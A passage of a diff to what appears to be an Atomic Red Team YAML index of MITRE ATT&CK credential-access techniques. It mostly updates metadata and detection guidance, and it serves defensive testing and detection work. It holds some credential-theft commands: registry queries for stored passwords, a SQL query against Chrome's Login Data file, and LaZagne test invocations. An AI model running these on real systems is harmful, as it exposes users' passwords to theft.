https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/ + description: Chen, J.. (2020, January 29). Attacker's Tactics and Techniques + in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021. - source_name: Specter Ops - Cloud Credential Storage url: https://posts.specterops.io/head-in-the-clouds-bd038bb69e48 description: Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-12T18:32:32.803Z' + created: '2020-02-04T12:52:13.006Z' x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure + - Containers x_mitre_contributors: + - Rory McCune, Aqua Security + - Jay Chen, Palo Alto Networks + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee - Microsoft Threat Intelligence Center (MSTIC) x_mitre_data_sources: - - Process command-line parameters - - File monitoring + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: 'While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line @@ -18828,7 +843,7 @@ credential-access: x_mitre_system_requirements: - Access to files x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1552.001 atomic_tests: - name: Extract Browser and System credentials with LaZagne @@ -18888,12 +903,6 @@ credential-access: elevation_required: true T1555: technique: - created: '2020-02-11T18:48:28.456Z' - modified: '2020-03-25T18:40:15.564Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - type: attack-pattern id: attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0 description: Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, @@ -18909,6 +918,12 @@ credential-access: - source_name: mitre-attack external_id: T1555 url: https://attack.mitre.org/techniques/T1555 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-29T21:00:19.428Z' + created: '2020-02-11T18:48:28.456Z' x_mitre_platforms: - Linux - macOS @@ -18923,11 +938,11 @@ credential-access: x_mitre_permissions_required: - Administrator x_mitre_data_sources: - - PowerShell logs - - API monitoring - - File monitoring - - Process monitoring - - System calls + - 'Process: Process Creation' + - 'File: File Access' + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'Process: Process Access' identifier: T1555 atomic_tests: - name: Extract Windows Credential Manager via VBA @@ -18965,39 +980,11 @@ credential-access: T1555.003: technique: created: '2020-02-12T18:57:36.041Z' - modified: '2020-02-17T13:20:02.386Z' + modified: '2021-04-14T14:03:47.293Z' kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access type: attack-pattern - id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8 - description: "Adversaries may acquire credentials from web browsers by reading - files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) - Web browsers commonly save credentials such as website usernames and passwords - so that they do not need to be entered manually in the future. Web browsers - typically store the credentials in an encrypted format within a credential - store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor - example, on Windows systems, encrypted credentials may be obtained from Google - Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User - Data\\Default\\Login Data and executing a SQL query: SELECT action_url, - username_value, password_value FROM logins;. The plaintext password - can then be obtained by passing the encrypted credentials to the Windows API - function CryptUnprotectData, which uses the victim’s cached logon - credentials as the decryption key. (Citation: Microsoft CryptUnprotectData - ‎April 2018)\n \nAdversaries have executed similar procedures for common web - browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential - Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries - may also acquire credentials by searching web browser process memory for patterns - that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter - acquiring credentials from web browsers, adversaries may attempt to recycle - the credentials across different systems and/or accounts in order to expand - access. This can result in significantly furthering an adversary's objective - in cases where credentials gained from web browsers overlap with privileged - accounts (e.g. domain administrator)." - name: Credentials from Web Browsers - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1555.003 @@ -19006,7 +993,7 @@ credential-access: url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. - - source_name: Microsoft CryptUnprotectData ‎April 2018 + - source_name: Microsoft CryptUnprotectData April 2018 url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019. @@ -19023,12 +1010,48 @@ credential-access: url: https://github.com/putterpanda/mimikittenz description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019. - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Credentials from Web Browsers + description: "Adversaries may acquire credentials from web browsers by reading + files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) + Web browsers commonly save credentials such as website usernames and passwords + so that they do not need to be entered manually in the future. Web browsers + typically store the credentials in an encrypted format within a credential + store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor + example, on Windows systems, encrypted credentials may be obtained from Google + Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User + Data\\Default\\Login Data and executing a SQL query: SELECT action_url, + username_value, password_value FROM logins;. The plaintext password + can then be obtained by passing the encrypted credentials to the Windows API + function CryptUnprotectData, which uses the victim’s cached logon + credentials as the decryption key. (Citation: Microsoft CryptUnprotectData + April 2018)\n \nAdversaries have executed similar procedures for common web + browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential + Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores + Internet Explorer and Microsoft Edge credentials in Credential Lockers managed + by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries + may also acquire credentials by searching web browser process memory for patterns + that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter + acquiring credentials from web browsers, adversaries may attempt to recycle + the credentials across different systems and/or accounts in order to expand + access. This can result in significantly furthering an adversary's objective + in cases where credentials gained from web browsers overlap with privileged + accounts (e.g. domain administrator)." + id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8 + x_mitre_data_sources: + - 'File: File Access' + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_contributors: + - Ryan Benson, Exabeam + - Barry Shteiman, Exabeam + - Sylvain Gil, Exabeam + - RedHuntLabs, @redhuntlabs + x_mitre_permissions_required: + - User x_mitre_detection: 'Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User Data\Default\Login Data. Monitor file read events of web browser files @@ -19038,18 +1061,12 @@ credential-access: reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).' - x_mitre_permissions_required: - - User - x_mitre_contributors: - - Ryan Benson, Exabeam - - Barry Shteiman, Exabeam - - Sylvain Gil, Exabeam - - RedHuntLabs, @redhuntlabs - x_mitre_data_sources: - - File monitoring - - API monitoring - - PowerShell logs - - Process monitoring + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Linux + - macOS + - Windows identifier: T1555.003 atomic_tests: - name: Run Chrome-password Collector @@ -19136,6 +1153,24 @@ credential-access: command: "#{lazagne_path} browsers\n" T1552.002: technique: + created: '2020-02-04T12:58:40.678Z' + modified: '2020-02-07T20:49:18.834Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + type: attack-pattern + id: attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580 + description: |- + Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons. + + Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials) + + * Local Machine Hive: reg query HKLM /f password /t REG_SZ /s + * Current User Hive: reg query HKCU /f password /t REG_SZ /s + name: Credentials in Registry + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1552.002 @@ -19144,46 +1179,28 @@ credential-access: description: netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018. source_name: Pentestlab Stored Credentials - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Credentials in Registry - description: |- - Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons. - - Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials) - - * Local Machine Hive: reg query HKLM /f password /t REG_SZ /s - * Current User Hive: reg query HKCU /f password /t REG_SZ /s - id: attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-02-07T20:49:18.834Z' - created: '2020-02-04T12:58:40.678Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - Ability to query some Registry locations depends on the adversary's level - of access. User permissions are usually limited to access of user-related - Registry keys. - x_mitre_permissions_required: - - Administrator - - User + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Sudhanshu Chauhan, @Sudhanshu_C + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Access' x_mitre_detection: Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - x_mitre_contributors: - - Sudhanshu Chauhan, @Sudhanshu_C - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - Administrator + - User + x_mitre_system_requirements: + - Ability to query some Registry locations depends on the adversary's level + of access. User permissions are usually limited to access of user-related + Registry keys. + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' identifier: T1552.002 atomic_tests: - name: Enumeration for Credentials in Registry @@ -19278,12 +1295,15 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-24T20:46:23.547Z' + modified: '2021-04-22T20:20:14.595Z' created: '2020-02-11T18:45:34.293Z' x_mitre_contributors: + - ExtraHop - Vincent Le Toux x_mitre_data_sources: - - Windows event logs + - 'Active Directory: Active Directory Object Access' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_permissions_required: - Administrator x_mitre_detection: |- @@ -19375,12 +1395,15 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-08-26T14:16:48.125Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:10:26.613Z' created: '2020-02-11T19:05:02.399Z' x_mitre_data_sources: - - Authentication logs - - API monitoring - - DLL monitoring + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' x_mitre_permissions_required: - Administrator x_mitre_detection: "Monitor for calls to OpenProcess that can be @@ -19397,7 +1420,7 @@ credential-access: used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). " - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows @@ -19452,10 +1475,6 @@ credential-access: on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen. - x_mitre_data_sources: - - Authentication logs - - Windows Error Reporting - - Process monitoring x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_version: '1.1' @@ -19524,10 +1543,11 @@ credential-access: - Teodor Cimpoesu - Sudhanshu Chauhan, @Sudhanshu_C x_mitre_data_sources: - - File monitoring - - Network protocol analysis - - Network device logs - - Process use of network + - 'File: File Access' + - 'File: File Creation' + - 'File: File Modification' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: |- Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located. @@ -19538,6 +1558,65 @@ credential-access: - Windows x_mitre_is_subtechnique: false atomic_tests: [] + T1606: + technique: + external_references: + - source_name: mitre-attack + external_id: T1606 + url: https://attack.mitre.org/techniques/T1606 + - source_name: GitHub AWS-ADFS-Credential-Generator + url: https://github.com/damianh/aws-adfs-credential-generator + description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. + Retrieved December 16, 2020. + - description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass + the Cookie. Retrieved April 5, 2019. + url: https://wunderwuzzi23.github.io/blog/passthecookie.html + source_name: Pass The Cookie + - source_name: Unit 42 Mac Crypto Cookies January 2019 + url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ + description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware + Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. + - source_name: Microsoft SolarWinds Customer Guidance + url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State + Cyber Attacks. Retrieved December 17, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Forge Web Credentials + description: |- + Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. + + Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) + + Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance) + id: attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-14T14:29:27.631Z' + created: '2020-12-17T02:13:46.247Z' + x_mitre_data_sources: + - 'Logon Session: Logon Session Creation' + - 'Web Credential: Web Credential Creation' + - 'Web Credential: Web Credential Usage' + x_mitre_detection: Monitor for anomalous authentication activity, such as logons + or other user session activity associated with unknown accounts. Monitor for + unexpected and abnormal access to resources, including access of websites + and cloud-based applications by the same user in different locations or by + different systems that do not match expected configurations. + x_mitre_version: '1.1' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - SaaS + - Windows + - macOS + - Linux + - Azure AD + - Office 365 + - Google Workspace + atomic_tests: [] T1056.002: technique: external_references: @@ -19593,10 +1672,7 @@ credential-access: x_mitre_contributors: - Matthew Molyett, @s1air, Cisco Talos x_mitre_data_sources: - - PowerShell logs - - User interface - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' x_mitre_permissions_required: - User x_mitre_detection: |- @@ -19696,11 +1772,13 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-31T12:59:10.840Z' + modified: '2020-11-05T16:07:03.779Z' created: '2020-02-11T19:13:33.643Z' + x_mitre_contributors: + - Itamar Mizrahi, Cymptom x_mitre_data_sources: - - Authentication logs - - Windows event logs + - 'Active Directory: Active Directory Credential Request' + - 'Logon Session: Logon Session Metadata' x_mitre_permissions_required: - User x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed @@ -19711,7 +1789,7 @@ credential-access: that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n" - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows @@ -19843,8 +1921,8 @@ credential-access: x_mitre_permissions_required: - User x_mitre_data_sources: - - Process command-line parameters - - Windows event logs + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords @@ -19962,17 +2040,12 @@ credential-access: x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_data_sources: - - Windows Registry - - Windows event logs - - User interface - - Process command-line parameters - - Process monitoring - - PowerShell logs - - Loaded DLLs - - Kernel drivers - - DLL monitoring - - Binary file metadata - - API monitoring + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + - 'Process: Process Creation' + - 'File: File Modification' + - 'Process: Process Metadata' x_mitre_detection: 'Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), @@ -20068,8 +2141,7 @@ credential-access: x_mitre_contributors: - Praetorian x_mitre_data_sources: - - Authentication logs - - Windows event logs + - 'Active Directory: Active Directory Credential Request' x_mitre_system_requirements: - Valid domain account or the ability to sniff traffic within a domain x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos @@ -20139,11 +2211,9 @@ credential-access: x_mitre_permissions_required: - Administrator x_mitre_data_sources: - - PowerShell logs - - Process monitoring - - File monitoring - - System calls - - API monitoring + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'File: File Access' identifier: T1555.001 atomic_tests: - name: Keychain @@ -20175,26 +2245,14 @@ credential-access: name: sh T1056.001: technique: - id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 - description: "Adversaries may log user keystrokes to intercept credentials as - the user types them. Keylogging is likely to be used to acquire credentials - for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) - efforts are not effective, and may require an adversary to intercept keystrokes - on a system for a substantial period of time before credentials can be successfully - captured.\n\nKeylogging is the most prevalent type of input capture, with - many different ways of intercepting keystrokes.(Citation: Adventures of a - Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing - keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), - this focuses solely on API functions intended for processing keystroke data.\n* - Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* - Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) - may provide adversaries with hooks into the operating system of network devices - to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device - Attacks) " - name: Keylogging - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2020-02-11T18:58:11.791Z' + modified: '2020-10-21T01:30:56.227Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + - kill_chain_name: mitre-attack + phase_name: credential-access + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1056.001 @@ -20210,21 +2268,35 @@ credential-access: url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-10-21T01:30:56.227Z' - created: '2020-02-11T18:58:11.791Z' - x_mitre_platforms: - - Windows - - macOS - - Linux - - Network - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Keylogging + description: "Adversaries may log user keystrokes to intercept credentials as + the user types them. Keylogging is likely to be used to acquire credentials + for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) + efforts are not effective, and may require an adversary to intercept keystrokes + on a system for a substantial period of time before credentials can be successfully + captured.\n\nKeylogging is the most prevalent type of input capture, with + many different ways of intercepting keystrokes.(Citation: Adventures of a + Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing + keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), + this focuses solely on API functions intended for processing keystroke data.\n* + Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* + Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) + may provide adversaries with hooks into the operating system of network devices + to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device + Attacks) " + id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + x_mitre_permissions_required: + - Administrator + - root + - SYSTEM + - User x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, @@ -20233,15 +2305,13 @@ credential-access: keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.' - x_mitre_permissions_required: - - Administrator - - root - - SYSTEM - - User - x_mitre_data_sources: - - Windows Registry - - Process monitoring - - API monitoring + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + - macOS + - Linux + - Network identifier: T1056.001 atomic_tests: - name: Input Capture @@ -20389,10 +2459,10 @@ credential-access: - Eric Kuehn, Secure Ideas - Matthew Demaske, Adaptforward x_mitre_data_sources: - - Windows event logs - - Windows Registry - - Packet capture - - Netflow/Enclave netflow + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Flow' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_permissions_required: - User x_mitre_detection: |- @@ -20425,7 +2495,7 @@ credential-access: description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack, Mitigation, Defense. Retrieved February 21, 2020.' - source_name: ired Dumping LSA Secrets - url: ttps://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets + url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets. Retrieved February 21, 2020. - url: https://github.com/mattifestation/PowerSploit @@ -20444,14 +2514,13 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-24T20:35:42.440Z' + modified: '2021-04-21T21:12:38.361Z' created: '2020-02-21T16:22:09.493Z' x_mitre_contributors: - Ed Williams, Trustwave, SpiderLabs x_mitre_data_sources: - - Process monitoring - - PowerShell logs - - Process command-line parameters + - 'Windows Registry: Windows Registry Key Access' + - 'Command: Command Execution' x_mitre_detection: 'Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. @@ -20566,9 +2635,10 @@ credential-access: - Administrator - SYSTEM x_mitre_data_sources: - - Process command-line parameters - - PowerShell logs - - Process monitoring + - 'Process: Process Creation' + - 'Process: Process Access' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_contributors: - Ed Williams, Trustwave, SpiderLabs identifier: T1003.001 @@ -21029,9 +3099,10 @@ credential-access: MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow. x_mitre_data_sources: - - File monitoring - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Flow' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_permissions_required: - User x_mitre_version: '1.1' @@ -21055,6 +3126,10 @@ credential-access: description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019. url: https://www.secureworks.com/research/skeleton-key-malware-analysis + - source_name: Xorrior Authorization Plugins + url: https://xorrior.com/persistent-credential-theft/ + description: Chris Ross. (2018, October 17). Persistent Credential Theft with + Authorization Plugins. Retrieved April 22, 2021. - url: https://technet.microsoft.com/en-us/library/dn487457.aspx description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. @@ -21063,18 +3138,10 @@ credential-access: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Modify Authentication Process - description: "Adversaries may modify authentication mechanisms and processes - to access user credentials or enable otherwise unwarranted access to accounts. - The authentication process is handled by mechanisms, such as the Local Security - Authentication Server (LSASS) process and the Security Accounts Manager (SAM) - on Windows or pluggable authentication modules (PAM) on Unix-based systems, - responsible for gathering, storing, and validating credentials. \n\nAdversaries - may maliciously modify a part of this process to either reveal credentials - or bypass authentication mechanisms. Compromised credentials or access may - be used to bypass access controls placed on various resources on systems within - the network and may even be used for persistent access to remote systems and - externally available services, such as VPNs, Outlook Web Access and remote - desktop. " + description: |- + Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078). + + Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. id: attack-pattern--f4c1826f-a322-41cd-9557-562100848c84 type: attack-pattern kill_chain_phases: @@ -21082,15 +3149,20 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-21T02:41:11.743Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-26T20:08:31.712Z' created: '2020-02-11T19:01:56.887Z' + x_mitre_contributors: + - Chris Ross @xorrior x_mitre_data_sources: - - File monitoring - - Authentication logs - - API monitoring - - Windows Registry - - Process monitoring - - DLL monitoring + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_detection: "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification @@ -21102,18 +3174,20 @@ credential-access: exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools - such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure - robust, consistent account activity audit policies across the enterprise and - with externally accessible services. (Citation: TechNet Audit Policy) Look - for suspicious account behavior across systems that share accounts, either - user, admin, or service accounts. Examples: one account logged into multiple - systems simultaneously; multiple accounts logged into the same machine simultaneously; - accounts logged in at odd times or outside of business hours. Activity may - be from interactive login sessions or process ownership from accounts being - used to execute binaries on a remote system as a particular account. Correlate - other security systems with login information (e.g., a user has an active - login session but has not entered the building or does not have VPN access)." - x_mitre_version: '1.1' + such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor + for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: + Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity + audit policies across the enterprise and with externally accessible services. + (Citation: TechNet Audit Policy) Look for suspicious account behavior across + systems that share accounts, either user, admin, or service accounts. Examples: + one account logged into multiple systems simultaneously; multiple accounts + logged into the same machine simultaneously; accounts logged in at odd times + or outside of business hours. Activity may be from interactive login sessions + or process ownership from accounts being used to execute binaries on a remote + system as a particular account. Correlate other security systems with login + information (e.g., a user has an active login session but has not entered + the building or does not have VPN access)." + x_mitre_version: '2.0' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -21123,17 +3197,11 @@ credential-access: atomic_tests: [] T1003.003: technique: - created: 